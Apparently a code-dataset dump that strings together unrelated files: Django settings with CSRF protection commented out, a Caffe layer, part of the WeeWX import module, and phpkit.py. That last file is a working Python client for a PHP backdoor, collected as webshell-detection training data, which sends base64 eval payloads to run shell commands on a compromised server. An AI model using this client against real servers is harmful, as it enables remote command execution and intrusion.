'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite1.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite1.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
45bacb05fc6d52db3bf16e54711457bce0c21cec | 65efba029ed56dfc39040fed7f37f9133f3ff5b5 | /code/day-0/helloworld.py | e2d5bfe3785611c0dcd99a1e031786ccbfea1e9c | [] | no_license | richasharma3101/100--Days-of-Code | 59b1435742006ab3a5e165ab1ce653a34abc22e5 | 7dd7be91e5626ed4bca8979acd1a8dc50996f0c6 | refs/heads/master | 2020-03-22T09:28:40.009536 | 2018-07-09T09:26:39 | 2018-07-09T09:26:39 | 139,840,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37 | py | print("Hello World, This is Richa.")
| [
"[email protected]"
] | |
2a7bbb2f6b0ebaa6441414a848b597150d614732 | 2ba91a96863b5cb11aa273a4fe0737ed65c44cc8 | /utils/train_data/webshell/PHP/tennc/php/phpkit-0.2a/phpkit.py | 37a7e824006554751b171a591ba1bc437f644c3d | [
"MIT"
] | permissive | huangyuan666/webshell_detect_cms | ded1b40fe3dd6241c2d3b27e285f6751d79dca28 | aeda3b59a6d281df8eae8e5f34d839e98e546364 | refs/heads/master | 2023-03-19T15:14:59.021286 | 2020-06-12T01:35:50 | 2020-06-12T01:35:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,467 | py | #!/usr/bin/python
# Client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
if (len(sys.argv) != 2):
print "Usage: " + sys.argv[0] + " <url of backdoor>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
sys.exit(0)
url = sys.argv[1]
tester = """echo w00tw00tw00t"""
testkey = """w00tw00tw00t"""
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
if func == "system":
rawphp = """system('%s');""" %(cmd)
elif func == "shellexec":
rawphp = """echo shell_exec('%s');""" %(cmd)
elif func == "passthru":
rawphp = """passthru('%s');""" %(cmd)
elif func == "exec":
rawphp = """echo exec('%s');""" %(cmd)
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
### ###
# End of functions and object oriented stuff #
### ###
# the main body
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
| [
"[email protected]"
] | |
fabdf4b82016a7247201a57893901b238a5f23a8 | d1fd6af9c45513aaa81d14ad1781546d1976ea31 | /testtt.py | 2d379c44a1086ca5e35dff32e412953dc57078ae | [] | no_license | PaDome/test-2 | 3df76a2ae66e9376387fea7174013a910f0864a9 | a2a790a6c94fedb9bd0ba366f36d5bb651100479 | refs/heads/main | 2023-03-07T15:40:19.519203 | 2021-02-19T10:28:48 | 2021-02-19T10:28:48 | 340,328,656 | 0 | 0 | null | 2021-02-19T10:28:48 | 2021-02-19T10:03:22 | Python | UTF-8 | Python | false | false | 16 | py | into the battle
| [
"[email protected]"
] | |
ddeacda0ced47f2377a8e64f764360d8e6b9df56 | 14798e841df7cf929683b1c2ad3b0e275363760c | /TRANSrisk_fcm_project/settings.py | 15689e6f82338c01f1b07dbc19483ed8a2c16425 | [
"MIT"
] | permissive | gtsapelas/TRANSrisk_fcm_project | e4442eb8267714743ded7b223d7aca4b6777004a | d9d0efc6d693461fda14a71481c6061756527dcb | refs/heads/master | 2021-06-14T20:05:15.861647 | 2018-12-14T14:23:14 | 2018-12-14T14:23:14 | 95,547,583 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 995 | py | import os
# import the appropriate settings file
if os.environ.get('Production', '') == 'On':
# production settings
from TRANSrisk_fcm_project.settings_management.production import *
else:
try:
# custom settings files
settings_files = [sf.strip() for sf in
open('TRANSrisk_fcm_project//settings_management/settings-loader.txt', 'r').read().split(',')]
for settings_file in settings_files:
if settings_file == 'development_gtsap':
from TRANSrisk_fcm_project.settings_management.development_gtsap import *
elif settings_file == 'development':
from TRANSrisk_fcm_project.settings_management.development import *
elif settings_file == 'production':
from TRANSrisk_fcm_project.settings_management.production import *
except IOError:
# default development settings
from TRANSrisk_fcm_project.settings_management.development import *
| [
"[email protected]"
] | |
e6eb08b4c643785c7b78ee713d29c24d3a2919ea | 797f01431a3fc2a988be3c73ea0ee4d716238596 | /FATAUVA-Net/layers/multi_accuracy.py | ffbba3267a3478a3b7c75686a51a581d31353504 | [] | no_license | wuhao1999/FATAUVA-Net-for-facial-emotion-with-caffe | 27965e2a55de7abd104d3ad47a97f5668273a49b | af6e063cc927c04e3486b547d65ba1bebdd00882 | refs/heads/master | 2021-09-07T22:20:37.236429 | 2018-03-02T02:30:56 | 2018-03-02T02:30:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,878 | py | import caffe
import numpy as np
def hamming_distance(gt, est):
return sum([1 for (g, e) in zip(gt, est) if g == e]) / float(len(gt))
class MultilabelAccuracy(caffe.Layer):
def setup(self, bottom, top):
# params is a python dictionary with layer parameters.
params = eval(self.param_str)
self.batch_size = params['batch_size']
check_params(params)
top[0].reshape((1))
top[1].reshape((10))
print_info("MultilabelAccuracy", params)
def forward(self, bottom, top):
"""
Load data.
"""
acc = 0
s_acc = np.zeros(10)
gts = bottom[0].data.reshape(self.batch_size, 10)
ests = np.concatenate((bottom[1].data, bottom[2].data,
bottom[3].data, bottom[4].data), axis=1) > 0
for gt, est in zip(gts, ests): # for each ground truth and estimated label vector
acc += hamming_distance(gt, est)
for i in range(10):
gt = gts[:,i]
est = ests[:,i]
s_acc[i] = sum([1 for (g, e) in zip(gt, est) if g == e])
top[0].data[...] = acc / self.batch_size
top[1].data[...] = s_acc / self.batch_size
def reshape(self, bottom, top):
"""
There is no need to reshape the data, since the input is of fixed size
(rows and columns)
"""
pass
def backward(self, top, propagate_down, bottom):
"""
These layers does not back propagate
"""
pass
def check_params(params):
required = ['batch_size']
for r in required:
assert r in list(params.keys()), 'Params must include {}'.format(r)
def print_info(name, params):
print("{} initialized with bs: {}".format(
name,
params['batch_size']))
| [
"[email protected]"
] | |
adbea91105546269820aab57ff3f6c00ada74dfc | 6a95112805b64322953429270a305d01fef3faea | /dist/weewx-4.6.0b7/bin/weeimport/weeimport.py | 287ef4db6fe835db193cd81023ef16804fe1575a | [
"GPL-1.0-or-later",
"GPL-3.0-only",
"Apache-2.0"
] | permissive | tomdotorg/docker-weewx | c6d59dc492a9e53f3bc898f7b9f593717092d72c | 7085654f455d39b06acc688738fde27e1f78ad1e | refs/heads/main | 2023-06-08T17:57:44.184399 | 2023-01-30T11:21:23 | 2023-01-30T11:21:23 | 54,113,384 | 21 | 16 | Apache-2.0 | 2022-10-19T23:46:26 | 2016-03-17T11:39:29 | Dockerfile | UTF-8 | Python | false | false | 66,265 | py | #
# Copyright (c) 2009-2021 Tom Keffer <[email protected]> and Gary Roderick
#
# See the file LICENSE.txt for your full rights.
#
"""Module providing the base classes and API for importing observational data
into WeeWX.
"""
from __future__ import with_statement
from __future__ import print_function
from __future__ import absolute_import
# Python imports
import datetime
import logging
import numbers
import re
import sys
import time
from datetime import datetime as dt
import six
from six.moves import input
# WeeWX imports
import weecfg
import weecfg.database
import weewx
import weewx.qc
import weewx.wxservices
from weewx.manager import open_manager_with_config
from weewx.units import unit_constants, unit_nicknames, convertStd, to_std_system, ValueTuple
from weeutil.weeutil import timestamp_to_string, option_as_list, to_int, tobool, get_object, max_with_none
log = logging.getLogger(__name__)
# List of sources we support
SUPPORTED_SOURCES = ['CSV', 'WU', 'Cumulus', 'WD', 'WeatherCat']
# Minimum requirements in any explicit or implicit WeeWX field-to-import field
# map
MINIMUM_MAP = {'dateTime': {'units': 'unix_epoch'},
'usUnits': {'units': None},
'interval': {'units': 'minute'}}
# ============================================================================
# Error Classes
# ============================================================================
class WeeImportOptionError(Exception):
"""Base class of exceptions thrown when encountering an error with a
command line option.
"""
class WeeImportMapError(Exception):
"""Base class of exceptions thrown when encountering an error with an
external source-to-WeeWX field map.
"""
class WeeImportIOError(Exception):
"""Base class of exceptions thrown when encountering an I/O error with an
external source.
"""
class WeeImportFieldError(Exception):
"""Base class of exceptions thrown when encountering an error with a field
from an external source.
"""
class WeeImportDecodeError(Exception):
"""Base class of exceptions thrown when encountering a decode error with an
external source.
"""
# ============================================================================
# class Source
# ============================================================================
class Source(object):
""" Abstract base class used for interacting with an external data source
to import records into the WeeWX archive.
__init__() must define the following properties:
dry_run - Is this a dry run (ie do not save imported records
to archive). [True|False].
calc_missing - Calculate any missing derived observations.
[True|False].
ignore_invalid_data - Ignore any invalid data found in a source field.
[True|False].
tranche - Number of records to be written to archive in a
single transaction. Integer.
interval - Method of determining interval value if interval
field not included in data source.
['config'|'derive'|x] where x is an integer.
Child classes are used to interact with a specific source (eg CSV file,
WU). Any such child classes must define a getRawData() method which:
- gets the raw observation data and returns an iterable yielding data
dicts whose fields can be mapped to a WeeWX archive field
- defines an import data field-to-WeeWX archive field map (self.map)
self.raw_datetime_format - Format of date time data field from which
observation timestamp is to be derived. A
string in Python datetime string format such
as '%Y-%m-%d %H:%M:%S'. If the date time
data field cannot be interpreted as a string
wee_import attempts to interpret the field
as a unix timestamp. If the field is not a
valid unix timestamp an error is raised.
"""
# reg expression to match any HTML tag of the form <...>
_tags = re.compile(r'\<.*\>')
def __init__(self, config_dict, import_config_dict, options):
"""A generic initialisation.
Set some realistic default values for options read from the import
config file. Obtain objects to handle missing derived obs (if required)
and QC on imported data. Parse any --date command line option so we
know what records to import.
"""
# save our WeeWX config dict
self.config_dict = config_dict
# get our import config dict settings
# interval, default to 'derive'
self.interval = import_config_dict.get('interval', 'derive')
# do we ignore invalid data, default to True
self.ignore_invalid_data = tobool(import_config_dict.get('ignore_invalid_data',
True))
# tranche, default to 250
self.tranche = to_int(import_config_dict.get('tranche', 250))
# apply QC, default to True
self.apply_qc = tobool(import_config_dict.get('qc', True))
# calc-missing, default to True
self.calc_missing = tobool(import_config_dict.get('calc_missing', True))
# Some sources include UV index and solar radiation values even if no
# sensor was present. The WeeWX convention is to store the None value
# when a sensor or observation does not exist. Record whether UV and/or
# solar radiation sensor was present.
# UV, default to True
self.UV_sensor = tobool(import_config_dict.get('UV_sensor', True))
# solar, default to True
self.solar_sensor = tobool(import_config_dict.get('solar_sensor', True))
# initialise ignore extreme > 255.0 values for temperature and
# humidity fields for WD imports
self.ignore_extr_th = False
self.db_binding_wx = get_binding(config_dict)
self.dbm = open_manager_with_config(config_dict, self.db_binding_wx,
initialize=True,
default_binding_dict={'table_name': 'archive',
'manager': 'weewx.wxmanager.DaySummaryManager',
'schema': 'schemas.wview_extended.schema'})
# get the unit system used in our db
if self.dbm.std_unit_system is None:
# we have a fresh archive (ie no records) so cannot deduce
# the unit system in use, so go to our config_dict
self.archive_unit_sys = unit_constants[self.config_dict['StdConvert'].get('target_unit',
'US')]
else:
# get our unit system from the archive db
self.archive_unit_sys = self.dbm.std_unit_system
# get ourselves a QC object to do QC on imported records
try:
mm_dict = config_dict['StdQC']['MinMax']
except KeyError:
mm_dict = {}
self.import_QC = weewx.qc.QC(mm_dict)
# Process our command line options
self.dry_run = options.dry_run
self.verbose = options.verbose
self.no_prompt = options.no_prompt
self.suppress = options.suppress
# By processing any --date, --from and --to options we need to derive
# self.first_ts and self.last_ts; the earliest (exclusive) and latest
# (inclusive) timestamps of data to be imported. If we have no --date,
# --from or --to then set both to None (we then get the default action
# for each import type).
# First we see if we have a valid --date, if not then we look for
# --from and --to.
if options.date or options.date == "":
# there is a --date but is it valid
try:
_first_dt = dt.strptime(options.date, "%Y-%m-%d")
except ValueError:
# Could not convert --date. If we have a --date it must be
# valid otherwise we can't continue so raise it.
_msg = "Invalid --date option specified."
raise WeeImportOptionError(_msg)
else:
# we have a valid date so do some date arithmetic
_last_dt = _first_dt + datetime.timedelta(days=1)
self.first_ts = time.mktime(_first_dt.timetuple())
self.last_ts = time.mktime(_last_dt.timetuple())
elif options.date_from or options.date_to or options.date_from == '' or options.date_to == '':
# There is a --from and/or a --to, but do we have both and are
# they valid.
# try --from first
try:
if 'T' in options.date_from:
_from_dt = dt.strptime(options.date_from, "%Y-%m-%dT%H:%M")
else:
_from_dt = dt.strptime(options.date_from, "%Y-%m-%d")
_from_ts = time.mktime(_from_dt.timetuple())
except TypeError:
# --from not specified we can't continue so raise it
_msg = "Missing --from option. Both --from and --to must be specified."
raise WeeImportOptionError(_msg)
except ValueError:
# could not convert --from, we can't continue so raise it
_msg = "Invalid --from option."
raise WeeImportOptionError(_msg)
# try --to
try:
if 'T' in options.date_to:
_to_dt = dt.strptime(options.date_to, "%Y-%m-%dT%H:%M")
else:
_to_dt = dt.strptime(options.date_to, "%Y-%m-%d")
# since it is just a date we want the end of the day
_to_dt += datetime.timedelta(days=1)
_to_ts = time.mktime(_to_dt.timetuple())
except TypeError:
# --to not specified , we can't continue so raise it
_msg = "Missing --to option. Both --from and --to must be specified."
raise WeeImportOptionError(_msg)
except ValueError:
# could not convert --to, we can't continue so raise it
_msg = "Invalid --to option."
raise WeeImportOptionError(_msg)
# If we made it here we have a _from_ts and _to_ts. Do a simple
# error check first.
if _from_ts > _to_ts:
# from is later than to, raise it
_msg = "--from value is later than --to value."
raise WeeImportOptionError(_msg)
self.first_ts = _from_ts
self.last_ts = _to_ts
else:
# no --date or --from/--to so we take the default, set all to None
self.first_ts = None
self.last_ts = None
# initialise a few properties we will need during the import
# answer flags
self.ans = None
self.interval_ans = None
# properties to help with processing multi-period imports
self.period_no = None
# total records processed
self.total_rec_proc = 0
# total unique records identified
self.total_unique_rec = 0
# total duplicate records identified
self.total_duplicate_rec = 0
# time we started to first save
self.t1 = None
# time taken to process
self.tdiff = None
# earliest timestamp imported
self.earliest_ts = None
# latest timestamp imported
self.latest_ts = None
# initialise two sets to hold timestamps of records for which we
# encountered duplicates
# duplicates seen over all periods
self.duplicates = set()
# duplicates seen over the current period
self.period_duplicates = set()
@staticmethod
def sourceFactory(options, args):
"""Factory to produce a Source object.
Returns an appropriate object depending on the source type. Raises a
weewx.UnsupportedFeature error if an object could not be created.
"""
# get some key WeeWX parameters
# first the config dict to use
config_path, config_dict = weecfg.read_config(options.config_path, args)
# get wee_import config dict if it exists
import_config_path, import_config_dict = weecfg.read_config(None,
args,
file_name=options.import_config_path)
# we should have a source parameter at the root of out import config
# file, try to get it but be prepared to catch the error.
try:
source = import_config_dict['source']
except KeyError:
# we have no source parameter so check if we have a single source
# config stanza, if we do then proceed using that
_source_keys = [s for s in SUPPORTED_SOURCES if s in import_config_dict.keys]
if len(_source_keys) == 1:
# we have a single source config stanza so use that
source = _source_keys[0]
else:
# there is no source parameter and we do not have a single
# source config stanza so raise an error
_msg = "Invalid 'source' parameter or no 'source' parameter specified in %s" % import_config_path
raise weewx.UnsupportedFeature(_msg)
# if we made it this far we have all we need to create an object
module_class = '.'.join(['weeimport',
source.lower() + 'import',
source + 'Source'])
return get_object(module_class)(config_dict,
config_path,
import_config_dict.get(source, {}),
import_config_path,
options)
def run(self):
"""Main entry point for importing from an external source.
Source data may be provided as a group of records over a single period
(eg a single CSV file) or as a number of groups of records covering
multiple periods(eg a WU multi-day import). Step through each group of
records, getting the raw data, mapping the data and saving the data for
each period.
"""
# setup a counter to count the periods of records
self.period_no = 1
# obtain the lastUpdate meta data value before we import anything
last_update = to_int(self.dbm._read_metadata('lastUpdate'))
with self.dbm as archive:
if self.first_period:
# collect the time for some stats reporting later
self.t1 = time.time()
# it's convenient to give this message now
if self.dry_run:
print('Starting dry run import ...')
else:
print('Starting import ...')
if self.first_period and not self.last_period:
# there are more periods so say so
print("Records covering multiple periods have been identified for import.")
# step through our periods of records until we reach the end. A
# 'period' of records may comprise the contents of a file, a day
# of WU obs or a month of Cumulus obs
for period in self.period_generator():
# if we are importing multiple periods of data then tell the
# user what period we are up to
if not (self.first_period and self.last_period):
print("Period %d ..." % self.period_no)
# get the raw data
_msg = 'Obtaining raw import data for period %d ...' % self.period_no
if self.verbose:
print(_msg)
log.info(_msg)
try:
_raw_data = self.getRawData(period)
except WeeImportIOError as e:
print("**** Unable to load source data for period %d." % self.period_no)
log.info("**** Unable to load source data for period %d." % self.period_no)
print("**** %s" % e)
log.info("**** %s" % e)
print("**** Period %d will be skipped. Proceeding to next period." % self.period_no)
log.info("**** Period %d will be skipped. Proceeding to next period." % self.period_no)
# increment our period counter
self.period_no += 1
continue
except WeeImportDecodeError as e:
print("**** Unable to decode source data for period %d." % self.period_no)
log.info("**** Unable to decode source data for period %d." % self.period_no)
print("**** %s" % e)
log.info("**** %s" % e)
print("**** Period %d will be skipped. Proceeding to next period." % self.period_no)
log.info("**** Period %d will be skipped. Proceeding to next period." % self.period_no)
print("**** Consider specifying the source file encoding using the 'source_encoding' config option.")
log.info("**** Consider specifying the source file encoding using the 'source_encoding' config option.")
# increment our period counter
self.period_no += 1
continue
_msg = 'Raw import data read successfully for period %d.' % self.period_no
if self.verbose:
print(_msg)
log.info(_msg)
# map the raw data to a WeeWX archive compatible dictionary
_msg = 'Mapping raw import data for period %d ...' % self.period_no
if self.verbose:
print(_msg)
log.info(_msg)
_mapped_data = self.mapRawData(_raw_data, self.archive_unit_sys)
_msg = 'Raw import data mapped successfully for period %d.' % self.period_no
if self.verbose:
print(_msg)
log.info(_msg)
# save the mapped data to archive
# first advise the user and log, but only if its not a dry run
if not self.dry_run:
_msg = 'Saving mapped data to archive for period %d ...' % self.period_no
if self.verbose:
print(_msg)
log.info(_msg)
self.saveToArchive(archive, _mapped_data)
# advise the user and log, but only if its not a dry run
if not self.dry_run:
_msg = 'Mapped data saved to archive successfully for period %d.' % self.period_no
if self.verbose:
print(_msg)
log.info(_msg)
# increment our period counter
self.period_no += 1
# The source data has been processed and any records saved to
# archive (except if it was a dry run).
# now update the lastUpdate meta data field, set it to the max of
# the timestamp of the youngest record imported and the value of
# lastUpdate from before we started
new_last_update = max_with_none((last_update, self.latest_ts))
if new_last_update is not None:
self.dbm._write_metadata('lastUpdate', str(int(new_last_update)))
# If necessary, calculate any missing derived fields and provide
# the user with suitable summary output.
if self.total_rec_proc == 0:
# nothing was imported so no need to calculate any missing
# fields just inform the user what was done
_msg = 'No records were identified for import. Exiting. Nothing done.'
print(_msg)
log.info(_msg)
else:
# We imported something, but was it a dry run or not?
total_rec = self.total_rec_proc + self.total_duplicate_rec
if self.dry_run:
# It was a dry run. Skip calculation of missing derived
# fields (since there are no archive records to process),
# just provide the user with a summary of what we did.
_msg = "Finished dry run import"
print(_msg)
log.info(_msg)
_msg = "%d records were processed and %d unique records would "\
"have been imported." % (total_rec,
self.total_rec_proc)
print(_msg)
log.info(_msg)
if self.total_duplicate_rec > 1:
_msg = "%d duplicate records were ignored." % self.total_duplicate_rec
print(_msg)
log.info(_msg)
elif self.total_duplicate_rec == 1:
_msg = "1 duplicate record was ignored."
print(_msg)
log.info(_msg)
else:
# It was not a dry run so calculate any missing derived
# fields and provide the user with a summary of what we did.
if self.calc_missing:
# We were asked to calculate missing derived fields, so
# get a CalcMissing object.
# First construct a CalcMissing config dict
# (self.dry_run will never be true). Subtract 0.5
# seconds from earliest timestamp as calc_missing only
# calculates missing derived obs for records
# timestamped after start_ts.
calc_missing_config_dict = {'name': 'Calculate Missing Derived Observations',
'binding': self.db_binding_wx,
'start_ts': self.earliest_ts-0.5,
'stop_ts': self.latest_ts,
'trans_days': 1,
'dry_run': self.dry_run is True}
# now obtain a CalcMissing object
self.calc_missing_obj = weecfg.database.CalcMissing(self.config_dict,
calc_missing_config_dict)
_msg = "Calculating missing derived observations ..."
print(_msg)
log.info(_msg)
# do the calculations
self.calc_missing_obj.run()
_msg = "Finished calculating missing derived observations"
print(_msg)
log.info(_msg)
# now provide the summary report
_msg = "Finished import"
print(_msg)
log.info(_msg)
_msg = "%d records were processed and %d unique records " \
"imported in %.2f seconds." % (total_rec,
self.total_rec_proc,
self.tdiff)
print(_msg)
log.info(_msg)
if self.total_duplicate_rec > 1:
_msg = "%d duplicate records were ignored." % self.total_duplicate_rec
print(_msg)
log.info(_msg)
elif self.total_duplicate_rec == 1:
_msg = "1 duplicate record was ignored."
print(_msg)
log.info(_msg)
print("Those records with a timestamp already in the archive will not have been")
print("imported. Confirm successful import in the WeeWX log file.")
def parseMap(self, source_type, source, import_config_dict):
"""Produce a source field-to-WeeWX archive field map.
Data from an external source can be mapped to the WeeWX archive using:
- a fixed field map (WU),
- a fixed field map with user specified source units (Cumulus), or
- a user defined field/units map.
All user defined mapping is specified in the import config file.
To generate the field map first look to see if we have a fixed map, if
we do validate it and return the resulting map. Otherwise look for user
specified mapping in the import config file, construct the field map
and return it. If there is neither a fixed map or user specified
mapping then raise an error.
Input parameters:
source_type: String holding name of the section in
import_config_dict that holds config details for the
source being used.
source: Iterable holding the source data. Used if import field
names are included in the source data (eg CSV).
import_config_dict: config dict from import config file.
Returns a map as a dictionary of elements with each element structured
as follows:
'archive_field_name': {'field_name': 'source_field_name',
'units': 'unit_name'}
where:
- archive_field_name is an observation name in the WeeWX
database schema
- source_field_name is the name of a field from the external
source
- unit_name is the WeeWX unit name of the units used by
source_field_name
"""
# start with the minimum map
_map = dict(MINIMUM_MAP)
# Do the easy one first, do we have a fixed mapping, if so validate it
if self._header_map:
# We have a static map that maps header fields to WeeWX (eg WU).
# Our static map may have entries for fields that don't exist in our
# source data so step through each field name in our source data and
# only add those that exist to our resulting map.
# first get a list of fields, source could be a DictReader object
# or a list of dicts, a DictReader will have a fieldnames property
try:
_field_names = source.fieldnames
except AttributeError:
# Not a DictReader so need to obtain the dict keys, could just
# pick a record and extract its keys but some records may have
# different keys to others. Use sets and a generator
# comprehension.
_field_names = set().union(*(list(d.keys()) for d in source))
# now iterate over the field names
for _key in _field_names:
# if we know about the field name add it to our map
if _key in self._header_map:
_map[self._header_map[_key]['map_to']] = {'field_name': _key,
'units': self._header_map[_key]['units']}
# Do we have a user specified map, if so construct our field map
elif 'FieldMap' in import_config_dict:
# we have a user specified map so construct our map dict
for _key, _item in six.iteritems(import_config_dict['FieldMap']):
_entry = option_as_list(_item)
# expect 2 parameters for each option: source field, units
if len(_entry) == 2:
# we have 2 parameter so that's field and units
_map[_key] = {'field_name': _entry[0],
'units': _entry[1]}
# if the entry is not empty then it might be valid ie just a
# field name (eg if usUnits is specified)
elif _entry != [''] and len(_entry) == 1:
# we have 1 parameter so it must be just name
_map[_key] = {'field_name': _entry[0]}
else:
# otherwise its invalid so ignore it
pass
# now do some crude error checking
# dateTime. We must have a dateTime mapping. Check for a 'field_name'
# field under 'dateTime' and be prepared to catch the error if it
# does not exist.
try:
if _map['dateTime']['field_name']:
# we have a 'field_name' entry so continue
pass
else:
# something is wrong, we have a 'field_name' entry but it
# is not valid so raise an error
_msg = "Invalid mapping specified in '%s' for " \
"field 'dateTime'." % self.import_config_path
raise WeeImportMapError(_msg)
except KeyError:
_msg = "No mapping specified in '%s' for field " \
"'dateTime'." % self.import_config_path
raise WeeImportMapError(_msg)
# usUnits. We don't have to have a mapping for usUnits but if we
# don't then we must have 'units' specified for each field mapping.
if 'usUnits' not in _map or _map['usUnits'].get('field_name') is None:
# no unit system mapping do we have units specified for
# each individual field
for _key, _val in six.iteritems(_map):
# we don't need to check dateTime and usUnits
if _key not in ['dateTime', 'usUnits']:
if 'units' in _val:
# we have a units field, do we know about it
if _val['units'] not in weewx.units.conversionDict \
and _val['units'] not in weewx.units.USUnits.values():
# we have an invalid unit string so tell the
# user and exit
_msg = "Unknown units '%s' specified for " \
"field '%s' in %s." % (_val['units'],
_key,
self.import_config_path)
raise weewx.UnitError(_msg)
else:
# we don't have a units field, that's not allowed
# so raise an error
_msg = "No units specified for source field " \
"'%s' in %s." % (_key,
self.import_config_path)
raise WeeImportMapError(_msg)
# if we got this far we have a usable map, advise the user what we
# will use
_msg = "The following imported field-to-WeeWX field map will be used:"
if self.verbose:
print(_msg)
log.info(_msg)
for _key, _val in six.iteritems(_map):
if 'field_name' in _val:
_units_msg = ""
if 'units' in _val:
_units_msg = " in units '%s'" % _val['units']
_msg = " source field '%s'%s --> WeeWX field '%s'" % (_val['field_name'],
_units_msg,
_key)
if self.verbose:
print(_msg)
log.info(_msg)
else:
# no [[FieldMap]] stanza and no _header_map so raise an error as we
# don't know what to map
_msg = "No '%s' field map found in %s." % (source_type,
self.import_config_path)
raise WeeImportMapError(_msg)
return _map
def mapRawData(self, data, unit_sys=weewx.US):
"""Maps raw data to WeeWX archive record compatible dictionaries.
Takes an iterable source of raw data observations, maps the fields of
each row to a list of WeeWX compatible archive records and performs any
necessary unit conversion.
Input parameters:
data: iterable that yields the data records to be processed.
unit_sys: WeeWX unit system in which the generated records will be
provided. Omission will result in US customary (weewx.US)
being used.
Returns a list of dicts of WeeWX compatible archive records.
"""
# initialise our list of mapped records
_records = []
# initialise some rain variables
_last_ts = None
_last_rain = None
# list of fields we have given the user a warning over, prevents us
# giving multiple warnings for the same field.
_warned = []
# step through each row in our data
for _row in data:
_rec = {}
# first off process the fields that require special processing
# dateTime
if 'field_name' in self.map['dateTime']:
# we have a map for dateTime
try:
_raw_dateTime = _row[self.map['dateTime']['field_name']]
except KeyError:
_msg = "Field '%s' not found in source data." % self.map['dateTime']['field_name']
raise WeeImportFieldError(_msg)
# now process the raw date time data
if isinstance(_raw_dateTime, numbers.Number) or _raw_dateTime.isdigit():
# Our dateTime is a number, is it a timestamp already?
# Try to use it and catch the error if there is one and
# raise it higher.
try:
_rec_dateTime = int(_raw_dateTime)
except ValueError:
_msg = "Invalid '%s' field. Cannot convert '%s' to " \
"timestamp." % (self.map['dateTime']['field_name'],
_raw_dateTime)
raise ValueError(_msg)
else:
# it's a non-numeric string so try to parse it and catch
# the error if there is one and raise it higher
try:
_datetm = time.strptime(_raw_dateTime,
self.raw_datetime_format)
_rec_dateTime = int(time.mktime(_datetm))
except ValueError:
_msg = "Invalid '%s' field. Cannot convert '%s' to " \
"timestamp." % (self.map['dateTime']['field_name'],
_raw_dateTime)
raise ValueError(_msg)
# if we have a timeframe of concern does our record fall within
# it
if (self.first_ts is None and self.last_ts is None) or \
self.first_ts < _rec_dateTime <= self.last_ts:
# we have no timeframe or if we do it falls within it so
# save the dateTime
_rec['dateTime'] = _rec_dateTime
# update earliest and latest record timstamps
if self.earliest_ts is None or _rec_dateTime < self.earliest_ts:
self.earliest_ts = _rec_dateTime
if self.latest_ts is None or _rec_dateTime > self.earliest_ts:
self.latest_ts = _rec_dateTime
else:
# it is not so skip to the next record
continue
else:
